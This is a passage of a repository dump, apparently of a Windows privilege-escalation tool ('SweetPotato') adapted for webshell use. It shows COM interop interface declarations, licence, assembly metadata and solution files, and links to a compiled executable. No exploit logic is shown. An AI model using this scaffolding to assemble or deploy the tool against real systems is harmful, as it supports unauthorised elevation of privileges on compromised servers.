https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.pdb
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.dll
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-new/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.pdb
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/Com/IEnumSTATSTG.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
namespace SweetPotato {
    /// <summary>
    /// Managed import of the COM IEnumSTATSTG interface (enumerator over STATSTG
    /// entries). The member order must stay as declared because it defines the
    /// vtable layout of the imported interface.
    /// </summary>
    [ComImport]
    [Guid("0000000d-0000-0000-C000-000000000046")]
    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    public interface IEnumSTATSTG {
        // The user needs to allocate an STATSTG array whose size is celt.
        // PreserveSig: the raw status value is returned instead of being turned
        // into an exception, so the caller must check both the return value and
        // pceltFetched before reading entries from rgelt. The array is marshalled
        // without a size parameter, so passing an array shorter than celt is a
        // caller error that the marshaller is not told about.
        [PreserveSig]
        uint
        Next(uint celt, [MarshalAs(UnmanagedType.LPArray), Out] STATSTG[] rgelt, out uint pceltFetched);

        // Skips celt entries; a failure status surfaces as an exception (no PreserveSig).
        void Skip(uint celt);

        // Restarts the enumeration from the first entry.
        void Reset();

        // Returns a second enumerator, marshalled as a COM interface pointer.
        [return: MarshalAs(UnmanagedType.Interface)]
        IEnumSTATSTG Clone();
    }
}
22 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/Com/ILockBytes.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
namespace SweetPotato {
    /// <summary>
    /// Managed import of the COM ILockBytes interface (byte-array storage with
    /// offset-based reads and writes, sizing, region locking and statistics).
    /// The member order must stay as declared because it defines the vtable layout.
    /// </summary>
    [ComVisible(false)]
    [ComImport, InterfaceType(ComInterfaceType.InterfaceIsIUnknown), Guid("0000000A-0000-0000-C000-000000000046")]
    public interface ILockBytes {
        // Note: These two by-reference 32-bit integers (ULONG) could be used as return values instead,
        // but they are not tagged [retval] in the IDL, so for consistency's sake...
        // pv is a raw native pointer and cb a byte count: an implementation has to
        // bounds-check ulOffset and cb against its own storage before copying.
        void ReadAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbRead);
        void WriteAt(long ulOffset, System.IntPtr pv, int cb, out System.UInt32 pcbWritten);
        void Flush();
        void SetSize(long cb);
        void LockRegion(long libOffset, long cb, int dwLockType);
        void UnlockRegion(long libOffset, long cb, int dwLockType);
        void Stat(out System.Runtime.InteropServices.STATSTG pstatstg, int grfStatFlag);

    }


}
22 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/Com/IMarshal.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
namespace SweetPotato {

    /// <summary>
    /// Managed import of the COM <c>IMarshal</c> interface
    /// (IID 00000003-0000-0000-C000-000000000046, IUnknown-derived).
    /// The enum names below stand for the raw values the declaration used before:
    /// ComInterfaceType.InterfaceIsIUnknown == 1 and UnmanagedType.Interface == 28.
    /// Method order mirrors the COM vtable and must be kept as declared.
    /// </summary>
    [ComImport]
    [ComConversionLoss]
    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    [Guid("00000003-0000-0000-C000-000000000046")]
    public interface IMarshal {

        /// <summary>Reports, through <paramref name="pCid"/>, the class id used for unmarshalling.</summary>
        void GetUnmarshalClass(
            [In] ref Guid riid,
            [In] IntPtr pv,
            [In] uint dwDestContext,
            [In] IntPtr pvDestContext,
            [In] uint MSHLFLAGS,
            out Guid pCid);

        /// <summary>Reports, through <paramref name="pSize"/>, an upper bound for the marshalled size.</summary>
        void GetMarshalSizeMax(
            [In] ref Guid riid,
            [In] IntPtr pv,
            [In] uint dwDestContext,
            [In] IntPtr pvDestContext,
            [In] uint MSHLFLAGS,
            out uint pSize);

        /// <summary>Marshals an interface into the stream <paramref name="pstm"/>.</summary>
        void MarshalInterface(
            [In, MarshalAs(UnmanagedType.Interface)] IStream pstm,
            [In] ref Guid riid,
            [In] IntPtr pv,
            [In] uint dwDestContext,
            [In] IntPtr pvDestContext,
            [In] uint MSHLFLAGS);

        /// <summary>Unmarshals an interface from the stream <paramref name="pstm"/> into <paramref name="ppv"/>.</summary>
        void UnmarshalInterface(
            [In, MarshalAs(UnmanagedType.Interface)] IStream pstm,
            [In] ref Guid riid,
            out IntPtr ppv);

        void ReleaseMarshalData([In, MarshalAs(UnmanagedType.Interface)] IStream pstm);

        void DisconnectObject([In] uint dwReserved);
    }
}
20 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/Com/IStream.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
namespace SweetPotato {
    /// <summary>
    /// Managed import of the COM <c>IStream</c> interface
    /// (IID 0000000c-0000-0000-C000-000000000046, IUnknown-derived).
    /// Method order mirrors the COM vtable and must be kept as declared.
    /// </summary>
    [ComImport]
    [Guid("0000000c-0000-0000-C000-000000000046")]
    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    public interface IStream {
        /// <summary>
        /// Reads into <paramref name="pv"/>. The array is marshalled as an LPArray whose
        /// length comes from parameter index 1 (<paramref name="cb"/>).
        /// </summary>
        void Read(
            [MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1), Out] byte[] pv,
            uint cb,
            out uint pcbRead);

        /// <summary>
        /// Writes from <paramref name="pv"/>. The array is marshalled as an LPArray whose
        /// length comes from parameter index 1 (<paramref name="cb"/>).
        /// </summary>
        void Write(
            [MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 1)] byte[] pv,
            uint cb,
            out uint pcbWritten);

        void Seek(long dlibMove, uint dwOrigin, out long plibNewPosition);

        void SetSize(long libNewSize);

        void CopyTo(IStream pstm, long cb, out long pcbRead, out long pcbWritten);

        void Commit(uint grfCommitFlags);

        void Revert();

        void LockRegion(long libOffset, long cb, uint dwLockType);

        void UnlockRegion(long libOffset, long cb, uint dwLockType);

        void Stat(out STATSTG pstatstg, uint grfStatFlag);

        void Clone(out IStream ppstm);
    }
}
20 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2020 CCob
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly identity metadata. These attributes are compiled into the assembly,
// so editing a value here changes what the built binary reports about itself.
// NOTE(review): title and product read "SharpPotato" although the solution and
// namespace are named SweetPotato.
[assembly: AssemblyTitle("SharpPotato"), AssemblyProduct("SharpPotato")]
[assembly: AssemblyDescription(""), AssemblyConfiguration(""), AssemblyCompany("")]
[assembly: AssemblyCopyright("Copyright © 2020"), AssemblyTrademark(""), AssemblyCulture("")]

// Types in this assembly are hidden from COM by default; a type that has to be
// reachable from COM must opt in with [ComVisible(true)] on that type.
[assembly: ComVisible(false)]

// Typelib ID used if the project is exposed to COM. It is the same value as the
// project GUID in SweetPotato.sln. Like the strings above, it is stored in the
// assembly metadata of every build, so it is a stable static attribute to look
// for when triaging an unknown .NET binary.
[assembly: Guid("1bf9c10f-6f89-4520-9d2e-aaf17d17ba5e")]

// Version = Major.Minor.Build.Revision.
// All four parts may be given explicitly, or Build and Revision can be
// auto-generated with '*', e.g.:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/SweetPotato.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.779
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SweetPotato", "SweetPotato.csproj", "{1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {2BF3BEBF-0E18-43E5-A34F-BC2C9ABDFEDD}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/app.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/app.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-old/bin/Release/SweetPotato.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/SweetPotato-Webshell-old/bin/Release/SweetPotato.exe
--------------------------------------------------------------------------------
/img/cs-old.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/img/cs-old.png
--------------------------------------------------------------------------------
/img/cs-old2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/img/cs-old2.png
--------------------------------------------------------------------------------
/img/webshell-new.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/img/webshell-new.png
--------------------------------------------------------------------------------
/img/webshell-old.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/uknowsec/SweetPotato/b3985df53a2543fee80323ecf68bedf2c17db6eb/img/webshell-old.png
--------------------------------------------------------------------------------